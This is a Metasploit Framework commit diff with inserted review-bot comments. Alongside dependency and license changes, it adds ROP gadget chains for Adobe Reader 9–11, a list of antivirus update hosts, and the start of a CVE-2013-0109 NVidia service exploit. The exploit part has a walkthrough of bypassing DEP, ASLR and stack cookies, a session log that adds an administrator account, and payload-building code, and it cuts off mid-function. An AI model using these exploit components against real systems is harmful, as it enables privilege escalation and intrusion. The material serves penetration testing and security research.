Update against upstream

bug/bundler_fix
jvazquez-r7 2014-01-02 12:55:46 -06:00
commit ec8d24c376
207 changed files with 13378 additions and 4128 deletions


@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>


@ -2,6 +2,8 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Needed by msfgui and other rpc components
@ -17,7 +19,7 @@ group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end
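Review bot: `gem 'bcrypt-ruby'` is added with no version constraint, while `metasploit_data_models` in the same section is pinned with `~> 0.16.9`; Gemfile.lock resolves it to 3.1.2 today, but any later `bundle update` may pull a future major release of a cryptographic dependency with a changed API. Pin it in the file's own style, e.g. `gem 'bcrypt-ruby', '~> 3.1'`. The comment above it names only the module that needs it; a few words on what the gem is used for (presumably hashing the new password for the CFME reset module) would tell a maintainer when it could be dropped.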


@ -13,6 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0)
arel (3.0.2)
bcrypt-ruby (3.1.2)
builder (3.0.4)
database_cleaner (1.1.1)
diff-lcs (1.2.4)
@ -21,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -61,11 +62,12 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
bcrypt-ruby
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

LICENSE

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause


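--- /dev/null
+++ b/data/ropdb/reader.xml
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+<compatibility>
+<target>9</target>
+</compatibility>
+<gadgets base="0x4a800000">
+<gadget offset="0x2313d">pop ecx # ret</gadget>
+<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
+<gadget offset="0x01f90">pop eax # ret</gadget>
+<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x07e7d">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x0155a">pop edi # ret</gadget>
+<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x2d4de">pop ebx # ret</gadget>
+<gadget offset="0x01f90">pop eax # ret</gadget>
+<gadget offset="0x476aa">pop ecx # ret</gadget>
+<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x44122">mov edx, ecx</gadget>
+<gadget offset="0x476aa">pop ecx # ret</gadget>
+<gadget offset="0x07e7d">call [eax] # ret</gadget>
+<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
+<gadget offset="0x476ab">ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
+<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
+</gadgets>
+</rop>
+<rop>
+<compatibility>
+<target>10</target>
+</compatibility>
+<gadgets base="0x4a800000">
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
+<gadget offset="0x2007d">pop eax # ret</gadget>
+<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x246d5">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x05016">pop edi # ret</gadget>
+<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x14241">pop ebx # ret</gadget>
+<gadget offset="0x2007d">pop eax # ret</gadget>
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x4b49d">mov edx, ecx</gadget>
+<gadget offset="0x26015">pop ecx # ret</gadget>
+<gadget offset="0x246d5">call [eax] # ret</gadget>
+<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
+<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
+<gadget offset="0x2a8df">ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
+<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
+</gadgets>
+</rop>
+<rop>
+<compatibility>
+<target>11</target>
+</compatibility>
+<gadgets base="0x4a800000">
+<gadget offset="0x5822c">pop ecx # ret</gadget>
+<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
+<gadget offset="0x5597f">pop eax # ret</gadget>
+<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
+<gadget offset="0x3f1d5">call [eax] # ret</gadget>
+<gadget value="0xffffffff">HANDLE hFile</gadget>
+<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
+<gadget value="0x00000040">DWORD flProtect</gadget>
+<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
+<gadget value="0x00000000">LPCTSTR lpName</gadget>
+<gadget offset="0x55093">pop edi # ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
+<gadget offset="0x5597f">pop eax # ret</gadget>
+<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
+<gadget value="junk">JUNK</gadget>
+<gadget offset="0x5822c">pop ecx # ret</gadget>
+<gadget offset="0x3f1d5">call [eax] # ret</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
+<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
+<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
+<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
+<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
+<gadget offset="0x505a0">memcpy address</gadget>
+<gadget offset="0x60bc4">call eax # ret</gadget>
+<gadget offset="0x505a0">memcpy address</gadget>
+<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
+<gadget offset="0x463d0">pop ebx # ret</gadget>
+<gadget value="0x00000400">memcpy length</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x5d4f8">pop edx # ret</gadget>
+<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
+</gadgets>
+</rop>
+</db>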
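Review bot: In all three chains the CreateFileMappingA argument block labels both the fourth and the fifth value `DWORD dwMaximumSizeHigh`; the second one, `0x00001000`, is the low dword of the mapping size, and these labels are exactly what a reader uses to audit the chain against the API signature. Change each `<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>` to `<gadget value="0x00001000">DWORD dwMaximumSizeLow</gadget>`. The `<target>` values 9, 10 and 11 presumably denote Adobe Reader major versions (the file is reader.xml), but nothing in the file says so; since XML allows comments, a one-line `<!-- target: Adobe Reader major version; base: non-ASLR module load address -->` near the top would help — confirm against the code that consumes this DB.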


@ -44,6 +44,8 @@
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>
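Review bot: The three added lines can be collapsed into the call itself, `Process %{var_proc} = Runtime.getRuntime().exec(new String[] { %{var_exepath} });`, which keeps the point of the change — the path is handed to exec() as a single argv element instead of being tokenized on whitespace by the String overload — without a named temporary; a short comment stating that reason would also stop someone from "simplifying" it back. Nothing in the hunk reads or closes the child's stdout/stderr, so if the launched executable writes more than the pipe buffer it can block; presumably the caller should at least close `%{var_proc}.getInputStream()` and `getErrorStream()` or use ProcessBuilder with redirection — confirm against the rest of the template. The enclosing method starts before the hunk.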



data/vncdll.x86.dll Executable file



@ -0,0 +1,28 @@
www.es-web.sophos.com
www.es-web.sophos.com.edgesuite.net
www.es-web-2.sophos.com
www.es-web-2.sophos.com.edgesuite.net
www.dnl-01.geo.kaspersky.com
www.downloads2.kaspersky-labs.com
www.liveupdate.symantecliveupdate.com
www.liveupdate.symantec.com
www.update.symantec.com
www.update.nai.com
www.download797.avast.com
www.guru.avg.com
www.osce8-p.activeupdate.trendmicro.com
www.forefrontdl.microsoft.com
es-web.sophos.com
es-web.sophos.com.edgesuite.net
es-web-2.sophos.com
es-web-2.sophos.com.edgesuite.net
dnl-01.geo.kaspersky.com
downloads2.kaspersky-labs.com
liveupdate.symantecliveupdate.com
liveupdate.symantec.com
update.symantec.com
update.nai.com
download797.avast.com
guru.avg.com
osce8-p.activeupdate.trendmicro.com
forefrontdl.microsoft.com



@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard
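Review bot: The replacement script is a bare `rake yard` with no directory change, so it only works when invoked from the repository root where the Rakefile lives, whereas the removed version located the tree via `$(dirname "$0")` and could be run from anywhere; it also still has no shebang. Suggest `#!/bin/sh` followed by `cd "$(dirname "$0")/.." && exec rake yard`. Whether the Rakefile defines a `yard` task is outside this diff, so confirm before relying on it.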


@ -70,7 +70,8 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
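Review bot: Appending `exit 0` to the post-build command swallows any non-zero status from editbin.exe, so a missing tool or a failed `/OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0` rewrite now yields a successful build whose output lacks the intended subsystem version, and nobody is told. If the intent is only to tolerate editbin's warning-level return codes, make that visible: `editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL || echo editbin.exe failed: subsystem version not patched` and then `exit 0` on the next line. The hunk does not say why a non-zero status is expected here; a one-line comment in the project file would save the next person from removing the `exit 0`.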


@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\nvidia_nvsvc.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-0109 NVidia nvsvc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="NVidia nvsvc is not supported in x64" />
</Target>
</Project>


@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,33 @@
//===============================================================================================//
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "nvidia_nvsvc.h"
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
elevate_nvidia_nvsvc(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
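Review bot: `elevate_nvidia_nvsvc(lpReserved)` is called on DLL_PROCESS_ATTACH without checking lpReserved, and the exploit entry point added in the companion source in this commit immediately does `strlen((char*)payload)` on it; a conventional LoadLibrary of this DLL passes NULL there and crashes the host process. Guard it the way the DLL_QUERY_HMODULE case already does: `if (lpReserved != NULL) elevate_nvidia_nvsvc(lpReserved);`. Running the whole named-pipe exploit, including its printf calls, from DllMain also means it executes under the loader lock whenever a normal loader is used; that is presumably acceptable only because the reflective loader is the intended caller, and a comment on the DLL_PROCESS_ATTACH case saying so would make that contract explicit.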


@ -0,0 +1,546 @@
/*
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
- Bypass DEP + ASLR + /GS + CoE
=============================================================
(@peterwintrsmith)
** Initial release 25/12/12
** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
@seanderegge!
Hey all!
Here is an interesting exploit for a stack buffer overflow in the NVidia
Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
which has a NULL DACL configured, which should mean that any logged on user
or remote user in a domain context (Windows firewall/file sharing
permitting) should be able to exploit this vulnerability.
The buffer overflow occurs as a result of a bad memmove operation, with the
stack layout effectively looking like this:
[locals]
[received-data]
[response-buf]
[stack cookie]
[return address]
[arg space]
[etc]
The memmove copies data from the received-data buffer into the response-buf
buffer, unchecked. It is possible to control the offset from which the copy
starts in the received-data buffer by embedding a variable length string -
which forms part of the protocol message being crafted - as well as the
number of bytes copied into the response buffer.
The amount of data sent back over the named pipe is related to the number
of bytes copied rather than the maximum number of bytes that the buffer is
able to safely contain, so it is possible to leak stack data by copying
from the end of the received-data buffer, through the response-buf buffer
(which is zeroed first time round, and second time round contains whatever
was in it beforehand), right to the end of the stack frame (including stack
cookie and return address).
As the entire block of data copied is sent back, the stack cookie and
nvvsvc.exe base can be determined using the aforementioned process. The
stack is then trashed, but the function servicing pipe messages won't
return until the final message has been received, so it doesn't matter too
much.
It is then possible to exploit the bug by sending two further packets of
data: One containing the leaked stack cookie and a ROP chain dynamically
generated using offsets from the leaked nvvsvc.exe base (which simply fills
the response-buf buffer when this data is echoed back) and a second packet
which contains enough data to trigger an overwrite if data is copied from
the start of the received-data buffer into the response-buf (including the
data we primed the latter to contain - stack cookie and ROP chain).
Allowing the function to then return leads to execution of our ROP chain,
and our strategically placed Metasploit net user /add shellcode! We get
continuation of execution for free because the process spins up a thread
to handle each new connection, and there are no deadlocks etc.
I've included two ROP chains, one which works against the nvvsvc.exe
running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
from the Dell site, and one which works against the latest version of the
drivers for the same card, from:
http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
http://www.geforce.co.uk/drivers/results/54709
Hope you find this interesting - it's a fun bug to play with!
- Sample Session -
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
[@peterwintrsmith]
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
Action 1 of 9: - CONNECT
Action 2 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 3 of 9: - SERVER => CLIENT
Read 16504 (0x4078) characters from pipe
Action 4 of 9: Building exploit ...
=> Stack cookie 0xe2e2893340d4:
=> nvvsvc.exe base 0x13fb90000:
Action 5 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 6 of 9: - SERVER => CLIENT
Read 16384 (0x4000) characters from pipe
Action 7 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 8 of 9: - SERVER => CLIENT
Read 16896 (0x4200) characters from pipe
Action 9 of 9: - DISCONNECT
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
r00t
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>
*/
#include <Windows.h>
#include <stdio.h>
extern "C" {
#include "nvidia_nvsvc.h"
}
enum EProtocolAction
{
ProtocolAction_Connect = 0,
ProtocolAction_Receive,
ProtocolAction_Send,
ProtocolAction_Disconnect,
ProtocolAction_ReadCookie,
};
typedef struct
{
EProtocolAction Action;
PBYTE Buf;
DWORD Length;
} ProtocolMessage;
const int GENERIC_BUF_LENGTH = 0x10000;
#define WriteByte(val) {buf[offs] = val; offs += 1;}
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
#define BufRemaining() (sizeof(buf) - offs)
DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
{
DWORD dwWritten = 0;
if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
{
return dwWritten;
}
return 0;
}
DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
{
DWORD dwRead = 0, dwAvailable = 0;
if (bTimeout)
{
for (DWORD i = 0; i < 30; i++)
{
if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
{
goto Cleanup;
}
if (dwAvailable)
{
break;
}
Sleep(100);
}
if (!dwAvailable)
{
goto Cleanup;
}
}
if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
{
goto Cleanup;
}
Cleanup:
return dwRead;
}
HANDLE EstablishPipeConnection(char *pszPipe)
{
HANDLE hPipe = CreateFileA(
pszPipe,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hPipe == INVALID_HANDLE_VALUE)
{
return NULL;
}
return hPipe;
}
BYTE *BuildMalicious_LeakStack()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
for(UINT i=0; i<0x2000; i++)
WriteWord(0x41);
WriteWord(0);
WriteDword(0);
WriteDword(0x4078);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
return buf;
}
BYTE *BuildMalicious_FillBuf()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4000);
while(BufRemaining())
WriteDword(0x43434343);
return buf;
}
BYTE *BuildMalicious_OverwriteStack()
{
static BYTE buf[0x4020] = { 0 };
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4340); // enough to copy shellcode too
while (BufRemaining())
{
WriteDword(0x42424242);
}
return buf;
}
/*!
* @brief Entry point for the exploit code.
* @param payload Pointer to the payload memory, which must be NULL terminated.
*/
VOID elevate_nvidia_nvsvc(LPVOID payload)
{
SIZE_T payloadLen = strlen((char*)payload) + 1;
DWORD dwReturnCode = 1, dwBytesInOut = 0;
HANDLE hPipe = NULL;
static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 };
memset(rgReadBuf, 0, sizeof(rgReadBuf));
ProtocolMessage rgConvoMsg[] =
{
{ ProtocolAction_Connect, NULL, 0 },
